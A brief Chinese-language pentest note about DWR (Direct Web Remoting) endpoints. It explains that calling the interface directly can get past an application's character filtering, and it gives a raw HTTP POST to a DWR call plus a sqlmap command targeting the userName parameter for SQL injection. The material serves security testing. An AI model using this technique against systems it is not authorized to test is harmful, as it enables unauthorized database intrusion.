作者 -- Ends
昨天测试某系统没有发现比较严重的问题,从数据包中发现了dwr接口,尝试下XSS返回为text/plain。查看官方对DWR Security的说明(http://directwebremoting.org/dwr/security/index.html)也是说XSS、CSRF的。如果接口中包含上传功能,应该和webservice类似吧,还没有利用成功过。
使用接口时还存在一个问题,程序对特殊字符进行过滤,但是接口存在注入等问题,这样通过接口就可绕过程序的安全限制。
POST http://ends.cc/dwr/call/plaincall/providerregisterLbTProviderForm.forCheck.dwr HTTP/1.1
Accept: */*
Content-Type: text/plain
Referer: http://ends.cc/xxxxxxx
Accept-Language: zh-cn
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ends.cc
Content-Length: 354
Connection: Keep-Alive
Pragma: no-cache
callCount=1&page=/xxxxxxxxxx&httpSessionId=sssssssssssssssssssssssssssssssssss!164282365!432731937&scriptSessionId=sssssssssssssssssssssssssssssss&c0-scriptName=providerregisterLbTProviderForm&c0-methodName=forCheck&c0-id=0&c0-e1=string:testest&c0-e2=string:&c0-param0=Object_Object:{userName:reference:c0-e1,password:reference:c0-e2}&batchId=2
python sqlmap.py -r sqlmap.xml -p c0-e1